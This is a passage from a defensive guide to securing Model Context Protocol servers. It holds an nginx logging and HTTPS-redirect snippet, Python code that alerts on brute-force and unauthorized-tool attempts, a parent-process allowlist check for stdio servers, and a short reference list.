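# Access logging (the stock "combined" format does not record the client
# certificate; define a custom log_format that includes $ssl_client_s_dn to log client identity)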
access_log /var/log/nginx/mcp-access.log combined;
error_log /var/log/nginx/mcp-error.log warn;
}
# Redirect HTTP to HTTPS
server {
listen 80;
server_name mcp.internal.example.com;
return 301 https://$server_name$request_uri;
}
Authentication Monitoring and Alerting
"""
MCP Authentication monitoring -- detects authentication anomalies.
"""
import json
import logging
from datetime import datetime, timedelta
from collections import defaultdict
from dataclasses import dataclass

logger = logging.getLogger("mcp.auth.monitor")


@dataclass
class AuthEvent:
    timestamp: datetime  # naive UTC, to match the datetime.utcnow() comparisons below
    client_ip: str
    client_cn: str
    # success, failure, revoked, expired, rate_limited, unauthorized_tool
    event_type: str
    tool_name: str = ""
    details: str = ""


class AuthMonitor:
    """Monitors authentication events for anomalies."""

    def __init__(self, alert_callback=None):
        self.events: list[AuthEvent] = []
        self.failure_counts: dict[str, int] = defaultdict(int)
        self.alert_callback = alert_callback or self._default_alert
        self._alert_thresholds = {
            "brute_force": 10,         # failures per IP per hour
            "credential_stuffing": 5,  # unique invalid tokens per IP per hour
            "unusual_scope": 3,        # unauthorized tool access attempts
        }

    def record_event(self, event: AuthEvent):
        """Record and analyze an authentication event."""
        self.events.append(event)
        if event.event_type == "failure":
            self.failure_counts[event.client_ip] += 1
            self._check_brute_force(event)
        if event.event_type == "unauthorized_tool":
            self._check_scope_abuse(event)
        # Prune old events (keep 24 hours)
        cutoff = datetime.utcnow() - timedelta(hours=24)
        self.events = [e for e in self.events if e.timestamp > cutoff]

    def _check_brute_force(self, event: AuthEvent):
        """Detect brute force authentication attempts."""
        cutoff = datetime.utcnow() - timedelta(hours=1)
        recent_failures = sum(
            1 for e in self.events
            if e.client_ip == event.client_ip
            and e.event_type == "failure"
            and e.timestamp > cutoff
        )
        if recent_failures >= self._alert_thresholds["brute_force"]:
            self.alert_callback({
                "alert_type": "brute_force_detected",
                "severity": "high",
                "client_ip": event.client_ip,
                "failure_count": recent_failures,
                "window": "1 hour",
                "recommendation": f"Block IP {event.client_ip} and investigate",
            })

    def _check_scope_abuse(self, event: AuthEvent):
        """Detect clients trying to access unauthorized tools."""
        cutoff = datetime.utcnow() - timedelta(hours=1)
        scope_violations = sum(
            1 for e in self.events
            if e.client_cn == event.client_cn
            and e.event_type == "unauthorized_tool"
            and e.timestamp > cutoff
        )
        if scope_violations >= self._alert_thresholds["unusual_scope"]:
            self.alert_callback({
                "alert_type": "scope_abuse_detected",
                "severity": "high",
                "client_cn": event.client_cn,
                "violation_count": scope_violations,
                "last_tool": event.tool_name,
                "recommendation": (
                    f"Review permissions for {event.client_cn} "
                    f"and check for compromised credentials"
                ),
            })

    def _default_alert(self, alert: dict):
        logger.critical(json.dumps({
            "event": "mcp_auth_alert",
            **alert,
            "timestamp": datetime.utcnow().isoformat(),
        }))

    def get_dashboard_stats(self) -> dict:
        """Return stats for security dashboard."""
        cutoff_1h = datetime.utcnow() - timedelta(hours=1)
        cutoff_24h = datetime.utcnow() - timedelta(hours=24)
        events_1h = [e for e in self.events if e.timestamp > cutoff_1h]
        events_24h = [e for e in self.events if e.timestamp > cutoff_24h]
        return {
            "last_hour": {
                "total": len(events_1h),
                "successes": sum(1 for e in events_1h if e.event_type == "success"),
                "failures": sum(1 for e in events_1h if e.event_type == "failure"),
                "unique_ips": len(set(e.client_ip for e in events_1h)),
            },
            "last_24h": {
                "total": len(events_24h),
                "successes": sum(1 for e in events_24h if e.event_type == "success"),
                "failures": sum(1 for e in events_24h if e.event_type == "failure"),
                "unique_ips": len(set(e.client_ip for e in events_24h)),
                "unique_clients": len(set(
                    e.client_cn for e in events_24h if e.event_type == "success"
                )),
            },
        }
Securing stdio-Based MCP Servers
stdio servers do not use network authentication, but they still need access control:
"""
Security controls for stdio-based MCP servers.
Since stdio uses process-level access, controls focus on:
- Verifying the parent process identity
- Restricting which tools the spawning process can access
- Logging all operations for audit
"""
import os
import logging

logger = logging.getLogger("mcp.stdio.security")


def verify_parent_process() -> dict:
    """
    Verify the identity of the process that spawned this MCP server.
    Returns parent process information for authorization decisions.
    Linux-only: relies on the /proc filesystem.
    """
    ppid = os.getppid()
    parent_info = {}
    try:
        # Read parent process command line
        cmdline_path = f"/proc/{ppid}/cmdline"
        with open(cmdline_path, 'rb') as f:
            cmdline = f.read().decode('utf-8', errors='replace').split('\x00')
        parent_info["cmdline"] = cmdline

        # Read parent process executable
        exe_path = os.readlink(f"/proc/{ppid}/exe")
        parent_info["executable"] = exe_path

        # Read parent process user
        stat_path = f"/proc/{ppid}/status"
        with open(stat_path, 'r') as f:
            for line in f:
                if line.startswith("Uid:"):
                    uids = line.split()[1:]
                    parent_info["uid"] = int(uids[0])
                elif line.startswith("Gid:"):
                    gids = line.split()[1:]
                    parent_info["gid"] = int(gids[0])
    except (FileNotFoundError, PermissionError) as e:
        logger.error("Cannot verify parent process %d: %s", ppid, e)
        parent_info["error"] = str(e)
    return parent_info


# Allowlist of executables that may spawn this MCP server.
# If the host launches servers through an interpreter or shell, the parent
# executable will be that interpreter, so adjust the entries accordingly.
ALLOWED_PARENTS = {
    "/usr/bin/claude",
    "/usr/local/bin/cursor",
    "/usr/bin/code",
    "/opt/mcp-host/bin/mcp-host",
}


def enforce_parent_allowlist():
    """Refuse to start if the parent process is not in the allowlist.

    This is a defense-in-depth check rather than authentication: it only
    inspects the immediate parent at startup.
    """
    parent = verify_parent_process()
    exe = parent.get("executable", "unknown")
    if exe not in ALLOWED_PARENTS:
        logger.critical(
            "MCP server started by unauthorized parent: %s (PID %d)",
            exe, os.getppid()
        )
        raise SystemExit(
            f"Unauthorized parent process: {exe}. "
            f"Allowed: {ALLOWED_PARENTS}"
        )
    logger.info("Parent process verified: %s (PID %d)", exe, os.getppid())
References
- VulnerableMCP Project: Systematic scan of 500+ public MCP servers finding 38% without authentication
- eSentire CISO Advisory: "Securing MCP Deployments" -- enterprise guidance for MCP authentication
- MCP Specification: Model Context Protocol -- Transport and session management sections
- OWASP ASI: Agentic Security Initiative -- Authentication and access control requirements
- Pomerium: "Zero Trust for MCP" -- proxy-based authentication for MCP servers
- RFC 8705: OAuth 2.0 Mutual-TLS Client Authentication and Certificate-Bound Access Tokens